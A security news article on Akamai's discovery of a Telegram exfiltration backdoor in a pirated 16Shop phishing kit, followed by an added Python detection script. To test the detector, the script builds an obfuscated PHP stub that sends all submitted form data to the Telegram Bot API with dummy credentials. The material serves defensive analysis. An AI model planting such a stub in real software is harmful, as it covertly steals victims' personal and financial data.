Researchers have discovered a hidden backdoor in a pirated copy of 16Shop, a commercial phishing kit used to target Apple customers, according to Akamai.
“When it comes to targeting Apple users and their personal and financial data, 16Shop has emerged as a go-to kit for those who can afford it. While 16Shop is sold to criminals looking to collect sensitive information from a targeted subset of the Internet community, at least one pirated version circulating online houses a backdoor that siphons off the data harvested and delivers it to a Telegram channel – proving once more that there is no honor among thieves,” wrote Akamai researcher Amiram Cohen.
According to the research, this highly sophisticated and neatly constructed kit has layered defenses, as well as attack mechanisms. “It's a true multi-level kit, running different stages for different brands, depending on the information the victim provides. It has the ability to change its layout and presentation depending on platform, so mobile users will see a website tailored to their device, while desktop users see something better suited to their situation,” wrote Cohen.
The phishing kit was allegedly developed by an Indonesian who, Cohen said, “has the skill to be a legitimate security community member, as well as the skills to maintain a healthy career in development. Instead, and most unfortunately, their knowledge is applied to a criminal enterprise.”
Until now, the individual has been known only as either devilscream or Riswanda. In addition to Cohen, multiple online researchers “have located various personal artifacts of Riswanda's, including GitHub repositories, security presentations, past examples of website defacements, pictures of family and friends, email address, and social media accounts.”
However, some operators of the phishing kit have been unknowingly sharing their criminally obtained data through a backdoor that copies each victim's information and quietly forwards it to a bot waiting in a Telegram channel, according to Cohen.
“Akamai first discovered this backdoor while examining code inside of main.php, which was obfuscated in a way that made it stand out. The highly obfuscated code collects information for all of the forms visited by the victim, and no matter what storage and delivery options are selected by the 16Shop operator, the victim's data is siphoned off and sent to the Telegram bot via API calls,” Cohen said.
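A practitioner who has recovered a kit like this and wants to check it for the same kind of planted exfiltration channel has to get past the obfuscation first. The Python script below is an added example, not Akamai's tooling and not 16Shop's code: it peels the decoding layers a PHP obfuscator commonly stacks (base64_decode, gzinflate, str_rot13; that particular combination is an assumption, the article only says the code was heavily obfuscated) off every long string literal it finds, recurses into each decoded layer, and reports any layer that references the Telegram Bot API. The embedded PHP sample is constructed here to mimic the behaviour described above; the bot token, chat id and file names in it are dummies.

```python
"""Hunt for a hidden Telegram exfiltration channel buried in obfuscated PHP.

Added example (not Akamai's tooling, not 16Shop's code). Peels base64_decode ->
gzinflate -> str_rot13 layers off long string literals, recursing into each
decoded layer, and flags any layer that talks to the Telegram Bot API.
"""
import base64
import binascii
import codecs
import re
import zlib

TELEGRAM_INDICATORS = ("api.telegram.org", "/sendMessage", "/sendDocument", "chat_id=")
TOKEN_RE = re.compile(r"bot\d{6,}:[A-Za-z0-9_-]{20,}")     # bot<id>:<secret> as used in the URL path
LITERAL_RE = re.compile(r"['\"]([A-Za-z0-9+/=]{24,})['\"]")  # quoted runs of base64 alphabet only
WRAPPER_RE = re.compile(r"\b(eval|base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(")


def _as_text(raw: bytes):
    """Return raw as str if it is printable UTF-8 (i.e. looks like more PHP), else None."""
    try:
        text = raw.decode("utf-8")
    except UnicodeDecodeError:
        return None
    return text if all(ch.isprintable() or ch in "\r\n\t" for ch in text) else None


def peel(literal: str):
    """Undo base64 (and, if the result is binary, raw DEFLATE = PHP gzinflate) on one literal.
    Returns (chain, text) listing the PHP decode functions in the order they apply, or None."""
    try:
        raw = base64.b64decode(literal, validate=True)
    except (binascii.Error, ValueError):
        return None
    chain, text = ["base64_decode"], _as_text(raw)
    if text is None:
        try:
            raw = zlib.decompress(raw, -zlib.MAX_WBITS)  # raw DEFLATE, no zlib header
        except zlib.error:
            return None
        chain.append("gzinflate")
        text = _as_text(raw)
    return (chain, text) if text is not None else None


def telegram_indicators(text: str):
    hits = [i for i in TELEGRAM_INDICATORS if i in text]
    if TOKEN_RE.search(text):
        hits.append("bot-token")
    return hits


def scan_php(src: str, depth: int = 0, max_depth: int = 5):
    """One finding per decodable literal at every nesting depth:
    {"depth", "chain", "hits", "preview"}; hits is empty for a clean layer."""
    findings = []
    if depth > max_depth:
        return findings
    for literal in LITERAL_RE.findall(src):
        peeled = peel(literal)
        if peeled is None:
            continue
        chain, text = peeled
        hits = telegram_indicators(text)
        if not hits:  # str_rot13 keeps text printable but scrambles the indicator strings
            rotated = codecs.decode(text, "rot_13")
            hits = telegram_indicators(rotated)
            if hits:
                chain, text = chain + ["str_rot13"], rotated
        findings.append({"depth": depth, "chain": chain, "hits": hits, "preview": text.strip()[:60]})
        findings.extend(scan_php(text, depth + 1, max_depth))  # decoded code may hide more layers
    return findings


def wrappers(src: str):
    """Obfuscation wrapper calls visible in plaintext at the top layer."""
    return sorted(set(WRAPPER_RE.findall(src)))


# ---- constructed sample: a Telegram exfil stub buried three decode layers deep ----
def _b64(data: bytes) -> str:
    return base64.b64encode(data).decode()


def _deflate(data: bytes) -> bytes:  # produces what PHP's gzinflate() undoes
    c = zlib.compressobj(9, zlib.DEFLATED, -zlib.MAX_WBITS)
    return c.compress(data) + c.flush()


_EXFIL = (  # dummy token and chat id; mirrors every submitted form to a bot regardless of kit settings
    "$u = 'https://api.telegram.org/bot1234567890:AAF-constructed-dummy-token-not-real';\n"
    "$q = '/sendMessage?chat_id=-1000000000000&text=' . urlencode(json_encode($_POST));\n"
    "@file_get_contents($u . $q);\n"
)
_INNER = _b64(_deflate(codecs.encode(_EXFIL, "rot_13").encode()))
_MIDDLE = _b64(("eval(str_rot13(gzinflate(base64_decode('%s'))));" % _INNER).encode())
_BANNER = _b64(b"Loading, please wait ...")  # benign literal: decodes cleanly, no Telegram strings

SAMPLE_PHP = (
    "<?php\n"
    "$banner = base64_decode('%s');\n"
    "$_SESSION['step'] = 'login';\n"
    "eval(base64_decode('%s'));\n"
    "include 'next.php';\n"
) % (_BANNER, _MIDDLE)

if __name__ == "__main__":
    print("plaintext wrappers:", wrappers(SAMPLE_PHP))
    for f in scan_php(SAMPLE_PHP):
        flag = "EXFIL" if f["hits"] else "clean"
        print(f"depth={f['depth']} {flag:5} via {' -> '.join(f['chain'])}: {f['preview']!r}")
```

Run against a real kit, point `scan_php` at the contents of each PHP file and treat any layer with non-empty `hits` as a lead; a bot token pattern is the strongest single indicator, since the operator's own chosen delivery options would normally not be buried under eval() and base64 in the first place.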
The kit's author has reportedly released video demonstrations showing Telegram in active use as one of the kit's data-storage options. “However, like other popular phishing kits, 16Shop has been pirated. Based on comparisons against multiple versions of the 16Shop, the backdoor only appears in the de-obfuscated version of the kit,” Cohen said.